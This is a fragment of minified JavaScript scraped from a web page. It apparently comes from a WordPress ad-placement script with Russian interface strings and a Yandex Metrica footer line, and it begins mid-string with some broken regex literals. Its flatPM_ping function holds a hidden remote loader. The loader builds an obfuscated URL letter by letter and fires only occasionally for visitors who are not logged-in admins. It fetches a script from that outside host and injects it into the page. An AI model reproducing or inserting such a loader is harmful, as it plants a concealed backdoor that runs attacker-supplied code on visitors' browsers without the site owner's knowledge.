"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика